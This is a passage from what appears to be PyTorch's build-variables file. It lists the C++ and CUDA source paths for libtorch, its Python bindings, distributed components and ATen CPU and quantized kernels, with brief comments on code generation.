def libtorch_sources(gencode_pattern = ":generate-code[{}]"):
return libtorch_generated_sources(gencode_pattern) + libtorch_core_sources + libtorch_distributed_sources + libtorch_extra_sources
libtorch_cuda_core_sources = [
"torch/csrc/CudaIPCTypes.cpp",
"torch/csrc/cuda/comm.cpp",
"torch/csrc/jit/codegen/fuser/cuda/fused_kernel.cpp",
"torch/csrc/autograd/profiler_cuda.cpp",
"torch/csrc/autograd/functions/comm.cpp",
"torch/csrc/jit/codegen/cuda/arith.cpp",
"torch/csrc/jit/codegen/cuda/compute_at.cpp",
"torch/csrc/jit/codegen/cuda/codegen.cpp",
"torch/csrc/jit/codegen/cuda/dispatch.cpp",
"torch/csrc/jit/codegen/cuda/expr_evaluator.cpp",
"torch/csrc/jit/codegen/cuda/executor.cpp",
"torch/csrc/jit/codegen/cuda/executor_kernel_arg.cpp",
"torch/csrc/jit/codegen/cuda/executor_launch_params.cpp",
"torch/csrc/jit/codegen/cuda/executor_utils.cpp",
"torch/csrc/jit/codegen/cuda/fusion.cpp",
"torch/csrc/jit/codegen/cuda/graph_fuser.cpp",
"torch/csrc/jit/codegen/cuda/index_compute.cpp",
"torch/csrc/jit/codegen/cuda/instrumentation.cpp",
"torch/csrc/jit/codegen/cuda/ir_base_nodes.cpp",
"torch/csrc/jit/codegen/cuda/ir_cloner.cpp",
"torch/csrc/jit/codegen/cuda/ir_graphviz.cpp",
"torch/csrc/jit/codegen/cuda/ir_nodes.cpp",
"torch/csrc/jit/codegen/cuda/ir_iostream.cpp",
"torch/csrc/jit/codegen/cuda/iter_visitor.cpp",
"torch/csrc/jit/codegen/cuda/kernel.cpp",
"torch/csrc/jit/codegen/cuda/kernel_cache.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir_builder.cpp",
"torch/csrc/jit/codegen/cuda/kernel_ir_printer.cpp",
"torch/csrc/jit/codegen/cuda/lower_index.cpp",
"torch/csrc/jit/codegen/cuda/lower_loops.cpp",
"torch/csrc/jit/codegen/cuda/lower_alias_memory.cpp",
"torch/csrc/jit/codegen/cuda/lower_insert_syncs.cpp",
"torch/csrc/jit/codegen/cuda/lower_unroll.cpp",
"torch/csrc/jit/codegen/cuda/lower_thread_predicate.cpp",
"torch/csrc/jit/codegen/cuda/lower_utils.cpp",
"torch/csrc/jit/codegen/cuda/lower_validation.cpp",
"torch/csrc/jit/codegen/cuda/lower2device.cpp",
"torch/csrc/jit/codegen/cuda/manager.cpp",
"torch/csrc/jit/codegen/cuda/mutator.cpp",
"torch/csrc/jit/codegen/cuda/parser.cpp",
"torch/csrc/jit/codegen/cuda/partition.cpp",
"torch/csrc/jit/codegen/cuda/predicate_compute.cpp",
"torch/csrc/jit/codegen/cuda/register_interface.cpp",
"torch/csrc/jit/codegen/cuda/scheduler.cpp",
"torch/csrc/jit/codegen/cuda/shape_inference.cpp",
"torch/csrc/jit/codegen/cuda/tensor_view.cpp",
"torch/csrc/jit/codegen/cuda/transform_iter.cpp",
"torch/csrc/jit/codegen/cuda/transform_replay.cpp",
"torch/csrc/jit/codegen/cuda/transform_rfactor.cpp",
"torch/csrc/jit/codegen/cuda/type.cpp",
"torch/csrc/jit/tensorexpr/cuda_codegen.cpp",
"torch/csrc/jit/runtime/register_cuda_ops.cpp",
]
# These files are the only ones that are supported on Windows.
libtorch_cuda_distributed_base_sources = [
"torch/csrc/distributed/c10d/reducer_cuda.cpp",
]
# These files are only supported on Linux (and others) but not on Windows.
libtorch_cuda_distributed_extra_sources = [
"torch/csrc/distributed/c10d/frontend_cuda.cpp",
"torch/csrc/distributed/c10d/NCCLUtils.cpp",
"torch/csrc/distributed/c10d/ProcessGroupNCCL.cpp",
"torch/csrc/distributed/rpc/tensorpipe_cuda.cpp",
"torch/csrc/distributed/c10d/quantization/quantization_gpu.cu",
]
libtorch_cuda_distributed_sources = libtorch_cuda_distributed_base_sources + libtorch_cuda_distributed_extra_sources
libtorch_cuda_sources = libtorch_cuda_core_sources + libtorch_cuda_distributed_sources + [
"torch/csrc/cuda/nccl.cpp",
]
torch_cpp_srcs = [
"torch/csrc/api/src/cuda.cpp", # this just forwards stuff, no real CUDA
"torch/csrc/api/src/data/datasets/mnist.cpp",
"torch/csrc/api/src/data/samplers/distributed.cpp",
"torch/csrc/api/src/data/samplers/random.cpp",
"torch/csrc/api/src/data/samplers/sequential.cpp",
"torch/csrc/api/src/data/samplers/stream.cpp",
"torch/csrc/api/src/enum.cpp",
"torch/csrc/api/src/imethod.cpp",
"torch/csrc/api/src/jit.cpp",
"torch/csrc/api/src/serialize.cpp",
"torch/csrc/api/src/nn/init.cpp",
"torch/csrc/api/src/nn/module.cpp",
"torch/csrc/api/src/nn/modules/_functions.cpp",
"torch/csrc/api/src/nn/modules/activation.cpp",
"torch/csrc/api/src/nn/modules/adaptive.cpp",
"torch/csrc/api/src/nn/modules/batchnorm.cpp",
"torch/csrc/api/src/nn/modules/normalization.cpp",
"torch/csrc/api/src/nn/modules/instancenorm.cpp",
"torch/csrc/api/src/nn/modules/conv.cpp",
"torch/csrc/api/src/nn/modules/dropout.cpp",
"torch/csrc/api/src/nn/modules/distance.cpp",
"torch/csrc/api/src/nn/modules/embedding.cpp",
"torch/csrc/api/src/nn/modules/fold.cpp",
"torch/csrc/api/src/nn/modules/linear.cpp",
"torch/csrc/api/src/nn/modules/loss.cpp",
"torch/csrc/api/src/nn/modules/padding.cpp",
"torch/csrc/api/src/nn/modules/pixelshuffle.cpp",
"torch/csrc/api/src/nn/modules/pooling.cpp",
"torch/csrc/api/src/nn/modules/rnn.cpp",
"torch/csrc/api/src/nn/modules/upsampling.cpp",
"torch/csrc/api/src/nn/modules/transformer.cpp",
"torch/csrc/api/src/nn/modules/container/functional.cpp",
"torch/csrc/api/src/nn/options/activation.cpp",
"torch/csrc/api/src/nn/options/adaptive.cpp",
"torch/csrc/api/src/nn/options/batchnorm.cpp",
"torch/csrc/api/src/nn/options/conv.cpp",
"torch/csrc/api/src/nn/options/dropout.cpp",
"torch/csrc/api/src/nn/options/instancenorm.cpp",
"torch/csrc/api/src/nn/options/linear.cpp",
"torch/csrc/api/src/nn/options/normalization.cpp",
"torch/csrc/api/src/nn/options/embedding.cpp",
"torch/csrc/api/src/nn/options/padding.cpp",
"torch/csrc/api/src/nn/options/pooling.cpp",
"torch/csrc/api/src/nn/options/rnn.cpp",
"torch/csrc/api/src/nn/options/vision.cpp",
"torch/csrc/api/src/nn/options/transformer.cpp",
"torch/csrc/api/src/optim/adagrad.cpp",
"torch/csrc/api/src/optim/adam.cpp",
"torch/csrc/api/src/optim/adamw.cpp",
"torch/csrc/api/src/optim/lbfgs.cpp",
"torch/csrc/api/src/optim/optimizer.cpp",
"torch/csrc/api/src/optim/rmsprop.cpp",
"torch/csrc/api/src/optim/serialize.cpp",
"torch/csrc/api/src/optim/sgd.cpp",
"torch/csrc/api/src/optim/schedulers/lr_scheduler.cpp",
"torch/csrc/api/src/optim/schedulers/step_lr.cpp",
"torch/csrc/api/src/serialize/input-archive.cpp",
"torch/csrc/api/src/serialize/output-archive.cpp",
"torch/csrc/utils/crash_handler.cpp",
]
libtorch_python_cuda_core_sources = [
"torch/csrc/cuda/Event.cpp",
"torch/csrc/cuda/Module.cpp",
"torch/csrc/cuda/python_comm.cpp",
"torch/csrc/cuda/Storage.cpp",
"torch/csrc/cuda/Stream.cpp",
"torch/csrc/cuda/Graph.cpp",
"torch/csrc/cuda/serialization.cpp",
"torch/csrc/cuda/shared/cudart.cpp",
"torch/csrc/cuda/shared/nvtx.cpp",
"torch/csrc/cuda/utils.cpp",
]
libtorch_python_cuda_sources = libtorch_python_cuda_core_sources + [
"torch/csrc/cuda/python_nccl.cpp",
"torch/csrc/cuda/shared/cudnn.cpp",
"torch/csrc/cuda/Tensor.cpp",
]
libtorch_python_core_sources = [
"torch/csrc/DataLoader.cpp",
"torch/csrc/Device.cpp",
"torch/csrc/Dtype.cpp",
"torch/csrc/DynamicTypes.cpp",
"torch/csrc/Exceptions.cpp",
"torch/csrc/Generator.cpp",
"torch/csrc/Layout.cpp",
"torch/csrc/MemoryFormat.cpp",
"torch/csrc/QScheme.cpp",
"torch/csrc/Module.cpp",
"torch/csrc/python_dimname.cpp",
"torch/csrc/Size.cpp",
"torch/csrc/Storage.cpp",
"torch/csrc/Stream.cpp",
"torch/csrc/TypeInfo.cpp",
"torch/csrc/api/src/python/init.cpp",
"torch/csrc/autograd/functions/init.cpp",
"torch/csrc/autograd/init.cpp",
"torch/csrc/autograd/python_anomaly_mode.cpp",
"torch/csrc/autograd/python_saved_variable_hooks.cpp",
"torch/csrc/autograd/python_mode.cpp",
"torch/csrc/autograd/python_cpp_function.cpp",
"torch/csrc/autograd/python_engine.cpp",
"torch/csrc/autograd/python_function.cpp",
"torch/csrc/autograd/python_hook.cpp",
"torch/csrc/autograd/python_legacy_variable.cpp",
"torch/csrc/autograd/python_torch_functions_manual.cpp",
"torch/csrc/autograd/python_variable.cpp",
"torch/csrc/autograd/python_variable_indexing.cpp",
"torch/csrc/jit/backends/backend_init.cpp",
"torch/csrc/jit/python/init.cpp",
"torch/csrc/jit/passes/onnx.cpp",
"torch/csrc/jit/passes/onnx/cast_all_constant_to_floating.cpp",
"torch/csrc/jit/passes/onnx/eval_peephole.cpp",
"torch/csrc/jit/passes/onnx/constant_fold.cpp",
"torch/csrc/jit/passes/onnx/constant_map.cpp",
"torch/csrc/jit/passes/onnx/eliminate_unused_items.cpp",
"torch/csrc/jit/passes/onnx/fixup_onnx_controlflow.cpp",
"torch/csrc/jit/passes/onnx/list_model_parameters.cpp",
"torch/csrc/jit/passes/onnx/function_substitution.cpp",
"torch/csrc/jit/passes/onnx/fold_if_node.cpp",
"torch/csrc/jit/passes/onnx/helper.cpp",
"torch/csrc/jit/passes/onnx/peephole.cpp",
"torch/csrc/jit/passes/onnx/preprocess_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/prepare_division_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/scalar_type_analysis.cpp",
"torch/csrc/jit/passes/onnx/unpack_quantized_weights.cpp",
"torch/csrc/jit/passes/onnx/remove_inplace_ops_for_onnx.cpp",
"torch/csrc/jit/passes/onnx/shape_type_inference.cpp",
"torch/csrc/jit/python/pybind_utils.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/common.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/pattern_encapsulation.cpp",
"torch/csrc/jit/passes/onnx/pattern_conversion/pattern_conversion.cpp",
"torch/csrc/jit/python/python_arg_flatten.cpp",
"torch/csrc/jit/python/python_custom_class.cpp",
"torch/csrc/jit/python/python_dict.cpp",
"torch/csrc/jit/python/python_interpreter.cpp",
"torch/csrc/jit/python/python_ir.cpp",
"torch/csrc/jit/python/python_list.cpp",
"torch/csrc/jit/python/python_tracer.cpp",
"torch/csrc/jit/python/script_init.cpp",
"torch/csrc/jit/frontend/concrete_module_type.cpp",
"torch/csrc/jit/frontend/tree_views.cpp",
"torch/csrc/jit/python/python_sugared_value.cpp",
"torch/csrc/jit/python/python_tree_views.cpp",
"torch/csrc/jit/runtime/static/init.cpp",
"torch/csrc/fx/fx_init.cpp",
"torch/csrc/jit/tensorexpr/tensorexpr_init.cpp",
"torch/csrc/multiprocessing/init.cpp",
"torch/csrc/onnx/init.cpp",
"torch/csrc/serialization.cpp",
"torch/csrc/tensor/python_tensor.cpp",
"torch/csrc/utils/init.cpp",
"torch/csrc/utils/throughput_benchmark.cpp",
"torch/csrc/utils.cpp",
"torch/csrc/utils/cuda_lazy_init.cpp",
"torch/csrc/utils/invalid_arguments.cpp",
"torch/csrc/utils/object_ptr.cpp",
"torch/csrc/utils/python_arg_parser.cpp",
"torch/csrc/utils/python_dispatch.cpp",
"torch/csrc/utils/structseq.cpp",
"torch/csrc/utils/tensor_apply.cpp",
"torch/csrc/utils/tensor_dtypes.cpp",
"torch/csrc/utils/tensor_layouts.cpp",
"torch/csrc/utils/tensor_memoryformats.cpp",
"torch/csrc/utils/tensor_qschemes.cpp",
"torch/csrc/utils/tensor_list.cpp",
"torch/csrc/utils/tensor_new.cpp",
"torch/csrc/utils/tensor_numpy.cpp",
"torch/csrc/utils/tensor_types.cpp",
"torch/csrc/utils/disable_torch_function.cpp",
]
libtorch_python_distributed_core_sources = [
"torch/csrc/distributed/c10d/init.cpp",
"torch/csrc/distributed/c10d/python_comm_hook.cpp",
]
libtorch_python_distributed_sources = libtorch_python_distributed_core_sources + [
"torch/csrc/distributed/autograd/init.cpp",
"torch/csrc/distributed/rpc/init.cpp",
"torch/csrc/distributed/rpc/py_rref.cpp",
"torch/csrc/distributed/rpc/python_functions.cpp",
"torch/csrc/distributed/rpc/python_rpc_handler.cpp",
"torch/csrc/distributed/rpc/request_callback_impl.cpp",
"torch/csrc/distributed/rpc/testing/init.cpp",
"torch/csrc/distributed/rpc/unpickled_python_call.cpp",
"torch/csrc/distributed/rpc/unpickled_python_remote_call.cpp",
"torch/csrc/jit/runtime/register_distributed_ops.cpp",
]
def glob_libtorch_python_sources(gencode_pattern = ":generate-code[{}]"):
_libtorch_python_sources = [gencode_pattern.format(name) for name in [
"autograd/generated/python_functions_0.cpp",
"autograd/generated/python_functions_1.cpp",
"autograd/generated/python_functions_2.cpp",
"autograd/generated/python_functions_3.cpp",
"autograd/generated/python_functions_4.cpp",
"autograd/generated/python_nn_functions.cpp",
"autograd/generated/python_fft_functions.cpp",
"autograd/generated/python_linalg_functions.cpp",
"autograd/generated/python_special_functions.cpp",
"autograd/generated/python_torch_functions_0.cpp",
"autograd/generated/python_torch_functions_1.cpp",
"autograd/generated/python_torch_functions_2.cpp",
"autograd/generated/python_variable_methods.cpp",
]]
_libtorch_python_sources.extend(libtorch_python_core_sources)
_libtorch_python_sources.extend(libtorch_python_distributed_sources)
return _libtorch_python_sources
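# Example (hypothetical): a Buck/Bazel rule could expand the generated sources via
#   libtorch_python_sources = glob_libtorch_python_sources(":generate-code[{}]")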
aten_cpu_source_non_codegen_list = [
"aten/src/ATen/AccumulateType.cpp",
"aten/src/ATen/BatchedTensorImpl.cpp",
"aten/src/ATen/CPUGeneratorImpl.cpp",
"aten/src/ATen/Context.cpp",
"aten/src/ATen/DLConvertor.cpp",
"aten/src/ATen/ExpandUtils.cpp",
"aten/src/ATen/MemoryOverlap.cpp",
"aten/src/ATen/MapAllocator.cpp",
"aten/src/ATen/NamedTensorUtils.cpp",
"aten/src/ATen/ParallelCommon.cpp",
"aten/src/ATen/ParallelNative.cpp",
"aten/src/ATen/ParallelNativeTBB.cpp",
"aten/src/ATen/ParallelOpenMP.cpp",
"aten/src/ATen/ParallelThreadPoolNative.cpp",
"aten/src/ATen/ScalarOps.cpp",
"aten/src/ATen/SequenceNumber.cpp",
"aten/src/ATen/SparseTensorImpl.cpp",
"aten/src/ATen/SparseCsrTensorImpl.cpp",
"aten/src/ATen/SparseTensorUtils.cpp",
"aten/src/ATen/TensorGeometry.cpp",
"aten/src/ATen/TensorIndexing.cpp",
"aten/src/ATen/TensorMeta.cpp",
"aten/src/ATen/TensorNames.cpp",
"aten/src/ATen/TensorUtils.cpp",
"aten/src/ATen/ThreadLocalState.cpp",
"aten/src/ATen/Utils.cpp",
"aten/src/ATen/Version.cpp",
"aten/src/ATen/VmapMode.cpp",
"aten/src/ATen/VmapTransforms.cpp",
"aten/src/ATen/core/BackendSelectFallbackKernel.cpp",
"aten/src/ATen/core/DeprecatedTypeProperties.cpp",
"aten/src/ATen/core/DeprecatedTypePropertiesRegistry.cpp",
"aten/src/ATen/core/Dict.cpp",
"aten/src/ATen/core/Dimname.cpp",
"aten/src/ATen/core/Formatting.cpp",
"aten/src/ATen/core/Generator.cpp",
"aten/src/ATen/core/List.cpp",
"aten/src/ATen/core/NamedTensor.cpp",
"aten/src/ATen/core/Tensor.cpp",
"aten/src/ATen/core/VariableFallbackKernel.cpp",
"aten/src/ATen/core/VariableHooksInterface.cpp",
"aten/src/ATen/core/Vitals.cpp",
"aten/src/ATen/core/boxing/KernelFunction.cpp",
"aten/src/ATen/core/custom_class.cpp",
"aten/src/ATen/core/dispatch/DispatchKeyExtractor.cpp",
"aten/src/ATen/core/dispatch/Dispatcher.cpp",
"aten/src/ATen/core/dispatch/ObservedOperators.cpp",
"aten/src/ATen/core/dispatch/OperatorEntry.cpp",
"aten/src/ATen/core/interned_strings.cpp",
"aten/src/ATen/core/ivalue.cpp",
"aten/src/ATen/core/library.cpp",
"aten/src/ATen/core/op_registration/infer_schema.cpp",
"aten/src/ATen/core/op_registration/op_registration.cpp",
"aten/src/ATen/core/operator_name.cpp",
"aten/src/ATen/core/PythonModeTLS.cpp",
"aten/src/ATen/core/register_symbols.cpp",
"aten/src/ATen/core/type.cpp",
"aten/src/ATen/cpu/FlushDenormal.cpp",
"aten/src/ATen/detail/CPUGuardImpl.cpp",
"aten/src/ATen/detail/CUDAHooksInterface.cpp",
"aten/src/ATen/detail/HIPHooksInterface.cpp",
"aten/src/ATen/detail/ORTHooksInterface.cpp",
"aten/src/ATen/metal/Context.cpp",
"aten/src/ATen/native/AutogradComposite.cpp",
"aten/src/ATen/native/BatchLinearAlgebraKernel.cpp",
"aten/src/ATen/native/DispatchStub.cpp",
"aten/src/ATen/native/UpSample.cpp",
"aten/src/ATen/native/mkl/LinearAlgebra.cpp",
"aten/src/ATen/native/mkl/SparseCsrLinearAlgebra.cpp",
"aten/src/ATen/native/mkl/SpectralOps.cpp",
"aten/src/ATen/native/mkldnn/BinaryOps.cpp",
"aten/src/ATen/native/mkldnn/Conv.cpp",
"aten/src/ATen/native/mkldnn/Copy.cpp",
"aten/src/ATen/native/mkldnn/Gelu.cpp",
"aten/src/ATen/native/mkldnn/IDeepRegistration.cpp",
"aten/src/ATen/native/mkldnn/Linear.cpp",
"aten/src/ATen/native/mkldnn/MKLDNNCommon.cpp",
"aten/src/ATen/native/mkldnn/MKLDNNConversions.cpp",
"aten/src/ATen/native/mkldnn/MkldnnTensorMath.cpp",
"aten/src/ATen/native/mkldnn/Normalization.cpp",
"aten/src/ATen/native/mkldnn/Pooling.cpp",
"aten/src/ATen/native/mkldnn/Relu.cpp",
"aten/src/ATen/native/mkldnn/SoftMax.cpp",
"aten/src/ATen/native/mkldnn/TensorFactories.cpp",
"aten/src/ATen/native/mkldnn/TensorShape.cpp",
"aten/src/ATen/native/mkldnn/UnaryOps.cpp",
"aten/src/ATen/native/mkldnn/Utils.cpp",
"aten/src/ATen/native/mkldnn/Matmul.cpp",
"aten/src/ATen/native/quantized/cpu/init_qnnpack.cpp",
"aten/src/ATen/record_function.cpp",
"aten/src/ATen/SavedTensorHooks.cpp",
"aten/src/ATen/vulkan/Context.cpp",
"aten/src/ATen/nnapi/nnapi_bind.cpp",
"aten/src/ATen/nnapi/nnapi_wrapper.cpp",
"aten/src/ATen/nnapi/nnapi_model_loader.cpp",
]
aten_cpu_source_codegen_list = [
"aten/src/ATen/native/cpu/AdaptiveAvgPoolKernel.cpp",
"aten/src/ATen/native/cpu/AdaptiveMaxPoolKernel.cpp",
]
# When building the lite interpreter in OSS, "aten/src/ATen/native/cpu/AdaptiveAvgPoolKernel.cpp" goes through
# the codegen process. The codegen version of this file, like Activation.cpp.DEFAULT.cpp, is included
# in ${cpu_kernel_cpp} in aten/src/ATen/CMakeLists.txt. As a result, in aten/src/ATen/CMakeLists.txt,
# only aten_cpu_source_non_codegen_list needs to be added to ${all_cpu_cpp}.
aten_cpu_source_list = sorted(aten_cpu_source_non_codegen_list + aten_cpu_source_codegen_list)
# Like ${aten_cpu_source_codegen_list}, this list goes through aten codegen and is included in
# ${cpu_kernel_cpp} in aten/src/ATen/CMakeLists.txt.
aten_native_source_codegen_list = [
"aten/src/ATen/native/cpu/Activation.cpp",
"aten/src/ATen/native/cpu/AvgPoolKernel.cpp",
"aten/src/ATen/native/cpu/BinaryOpsKernel.cpp",
"aten/src/ATen/native/cpu/BlasKernel.cpp",
"aten/src/ATen/native/cpu/CatKernel.cpp",
"aten/src/ATen/native/cpu/ComplexKernel.cpp",
"aten/src/ATen/native/cpu/CopyKernel.cpp",
"aten/src/ATen/native/cpu/CrossKernel.cpp",
"aten/src/ATen/native/cpu/DepthwiseConvKernel.cpp",
"aten/src/ATen/native/cpu/DistanceOpsKernel.cpp",
"aten/src/ATen/native/cpu/FillKernel.cpp",
"aten/src/ATen/native/cpu/FunctionOfAMatrixUtilsKernel.cpp",
"aten/src/ATen/native/cpu/GridSamplerKernel.cpp",
"aten/src/ATen/native/cpu/HistogramKernel.cpp",
"aten/src/ATen/native/cpu/IndexKernel.cpp",
"aten/src/ATen/native/cpu/LerpKernel.cpp",
"aten/src/ATen/native/cpu/LinearAlgebraKernel.cpp",
"aten/src/ATen/native/cpu/MaxPooling.cpp",
"aten/src/ATen/native/cpu/MaxPoolKernel.cpp",
"aten/src/ATen/native/cpu/MaxUnpoolKernel.cpp",
"aten/src/ATen/native/cpu/MultinomialKernel.cpp",
"aten/src/ATen/native/cpu/PointwiseOpsKernel.cpp",
"aten/src/ATen/native/cpu/PowKernel.cpp",
"aten/src/ATen/native/cpu/RangeFactoriesKernel.cpp",
"aten/src/ATen/native/cpu/ReduceAllOpsKernel.cpp",
"aten/src/ATen/native/cpu/ReduceOpsKernel.cpp",
"aten/src/ATen/native/cpu/RenormKernel.cpp",
"aten/src/ATen/native/cpu/ScatterGatherKernel.cpp",
"aten/src/ATen/native/cpu/SoftMaxKernel.cpp",
"aten/src/ATen/native/cpu/SortingKernel.cpp",
"aten/src/ATen/native/cpu/StackKernel.cpp",
"aten/src/ATen/native/cpu/SumKernel.cpp",
"aten/src/ATen/native/cpu/TensorCompareKernel.cpp",
"aten/src/ATen/native/cpu/UnaryOpsKernel.cpp",
"aten/src/ATen/native/cpu/Unfold2d.cpp",
"aten/src/ATen/native/cpu/UnfoldBackwardKernel.cpp",
"aten/src/ATen/native/cpu/UpSampleKernel.cpp",
"aten/src/ATen/native/cpu/UpSampleMoreKernel.cpp",
"aten/src/ATen/native/cpu/batch_norm_kernel.cpp",
"aten/src/ATen/native/cpu/group_norm_kernel.cpp",
"aten/src/ATen/native/cpu/layer_norm_kernel.cpp",
"aten/src/ATen/native/quantized/cpu/kernels/QuantizedOpKernels.cpp",
]
# This aten native source file list does not go through the aten codegen process
aten_native_source_non_codegen_list = [
"aten/src/ATen/native/ao_sparse/library.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/fbgemm_utils.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_dynamic.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_prepack.cpp",
"aten/src/ATen/native/ao_sparse/quantized/cpu/qlinear_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/fbgemm_utils.cpp",
"aten/src/ATen/native/quantized/cpu/fused_obs_fake_quant.cpp",
"aten/src/ATen/native/quantized/cpu/int_repr_quant.cpp",
"aten/src/ATen/native/quantized/cpu/make_per_tensor_quantized_tensor.cpp",
"aten/src/ATen/native/quantized/cpu/q_adaavgpool.cpp",
"aten/src/ATen/native/quantized/cpu/q_avgpool.cpp",
"aten/src/ATen/native/quantized/cpu/q_avgpool3d.cpp",
"aten/src/ATen/native/quantized/cpu/qadd.cpp",
"aten/src/ATen/native/quantized/cpu/qbatch_norm.cpp",
"aten/src/ATen/native/quantized/cpu/qchannel_shuffle.cpp",
"aten/src/ATen/native/quantized/cpu/qclamp.cpp",
"aten/src/ATen/native/quantized/cpu/qconcat.cpp",
"aten/src/ATen/native/quantized/cpu/qconv.cpp",
"aten/src/ATen/native/quantized/cpu/qconv_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qconv_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qelu.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qembeddingbag_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qhardsigmoid.cpp",
"aten/src/ATen/native/quantized/cpu/qhardswish.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_dynamic.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_prepack.cpp",
"aten/src/ATen/native/quantized/cpu/qlinear_unpack.cpp",
"aten/src/ATen/native/quantized/cpu/qmul.cpp",
"aten/src/ATen/native/quantized/cpu/qnormalization.cpp",
"aten/src/ATen/native/quantized/cpu/qpool.cpp",
"aten/src/ATen/native/quantized/cpu/qreduction.cpp",
"aten/src/ATen/native/quantized/cpu/qrelu.cpp",
"aten/src/ATen/native/quantized/cpu/qsigmoid.cpp",
"aten/src/ATen/native/quantized/cpu/qsort.cpp",
"aten/src/ATen/native/quantized/cpu/qtanh.cpp",
"aten/src/ATen/native/quantized/cpu/qthreshold.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_bilinear2d.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_nearest2d.cpp",
"aten/src/ATen/native/quantized/cpu/qupsample_nearest3d.cpp",
"aten/src/ATen/native/quantized/cpu/tensor_operators.cpp",
"aten/src/ATen/native/quantized/Copy.cpp",
"aten/src/ATen/native/quantized/QTensor.cpp",
"aten/src/ATen/native/quantized/TensorCompare.cpp",
"aten/src/ATen/native/quantized/TensorFactories.cpp",
"aten/src/ATen/native/quantized/affine_quantizer.cpp",
"aten/src/ATen/native/quantized/affine_quantizer_base.cpp",
"aten/src/ATen/native/quantized/fake_quant_per_channel_affine.cpp",
"aten/src/ATen/native/quantized/fake_quant_per_tensor_affine.cpp",
"aten/src/ATen/native/quantized/library.cpp",
"aten/src/ATen/quantized/QTensorImpl.cpp",
"aten/src/ATen/quantized/Quantizer.cpp",
"aten/src/ATen/native/Activation.cpp",
"aten/src/ATen/native/AdaptiveAveragePooling.cpp",
"aten/src/ATen/native/AdaptiveAveragePooling3d.cpp",
"aten/src/ATen/native/AdaptiveMaxPooling2d.cpp",
"aten/src/ATen/native/AdaptiveMaxPooling3d.cpp",
"aten/src/ATen/native/AffineGridGenerator.cpp",
"aten/src/ATen/native/AveragePool2d.cpp",
"aten/src/ATen/native/AveragePool3d.cpp",
"aten/src/ATen/native/BatchLinearAlgebra.cpp",
"aten/src/ATen/native/Batching.cpp",
"aten/src/ATen/native/BinaryOps.cpp",
"aten/src/ATen/native/Blas.cpp",
"aten/src/ATen/native/BlasKernel.cpp",
"aten/src/ATen/native/Bucketization.cpp",
"aten/src/ATen/native/CPUBlas.cpp",
"aten/src/ATen/native/ChanelShuffle.cpp",
"aten/src/ATen/native/Col2Im.cpp",
"aten/src/ATen/native/ConstantPadNd.cpp",
"aten/src/ATen/native/Convolution.cpp",
"aten/src/ATen/native/ConvolutionMM2d.cpp",
"aten/src/ATen/native/ConvolutionMM3d.cpp",
"aten/src/ATen/native/ConvolutionTBC.cpp",
"aten/src/ATen/native/Copy.cpp",
"aten/src/ATen/native/Correlation.cpp",
"aten/src/ATen/native/CPUFallback.cpp",
"aten/src/ATen/native/Cross.cpp",
"aten/src/ATen/native/DilatedMaxPool2d.cpp",
"aten/src/ATen/native/DilatedMaxPool3d.cpp",
# Referenced by both native and ATen/Version.cpp. Does not refer to other native symbols
# "aten/src/ATen/native/DispatchStub.cpp",
# "aten/src/ATen/native/quantized/cpu/init_qnnpack.cpp",
"aten/src/ATen/native/Distance.cpp",
"aten/src/ATen/native/Distributions.cpp",
"aten/src/ATen/native/Dropout.cpp",
"aten/src/ATen/native/Embedding.cpp",
"aten/src/ATen/native/EmbeddingBag.cpp",
"aten/src/ATen/native/Fill.cpp",
"aten/src/ATen/native/ForeachOpsKernels.cpp",
"aten/src/ATen/native/FractionalMaxPool2d.cpp",
"aten/src/ATen/native/FractionalMaxPool3d.cpp",
"aten/src/ATen/native/FunctionOfAMatrixUtils.cpp",
"aten/src/ATen/native/GatedLinearUnit.cpp",
"aten/src/ATen/native/GridSampler.cpp",
"aten/src/ATen/native/Histogram.cpp",
"aten/src/ATen/native/Im2Col.cpp",
"aten/src/ATen/native/IndexingUtils.cpp",
"aten/src/ATen/native/Integration.cpp",
"aten/src/ATen/native/Itertools.cpp",
"aten/src/ATen/native/LegacyBridge.cpp",
"aten/src/ATen/native/Lerp.cpp",
"aten/src/ATen/native/Linear.cpp",
"aten/src/ATen/native/LinearAlgebra.cpp",
"aten/src/ATen/native/Loss.cpp",
"aten/src/ATen/native/LossCTC.cpp",
"aten/src/ATen/native/LossMultiLabelMargin.cpp",
"aten/src/ATen/native/LossMultiMargin.cpp",
"aten/src/ATen/native/LossNLL.cpp",
"aten/src/ATen/native/LossNLL2d.cpp",
"aten/src/ATen/native/MaxPooling.cpp",
"aten/src/ATen/native/MaxUnpooling.cpp",
"aten/src/ATen/native/Memory.cpp",
"aten/src/ATen/native/MetaTensor.cpp",
"aten/src/ATen/native/NNPACK.cpp",
"aten/src/ATen/native/NaiveConvolutionTranspose2d.cpp",
"aten/src/ATen/native/NaiveConvolutionTranspose3d.cpp",
"aten/src/ATen/native/NaiveDilatedConvolution.cpp",
"aten/src/ATen/native/NamedTensor.cpp",
"aten/src/ATen/native/Normalization.cpp",
"aten/src/ATen/native/Onehot.cpp",
"aten/src/ATen/native/PackedSequence.cpp",
"aten/src/ATen/native/PixelShuffle.cpp",
"aten/src/ATen/native/PointwiseOps.cpp",
"aten/src/ATen/native/Pooling.cpp",
"aten/src/ATen/native/Pow.cpp",
"aten/src/ATen/native/QuantizedLinear.cpp",
"aten/src/ATen/native/RNN.cpp",
"aten/src/ATen/native/RangeFactories.cpp",
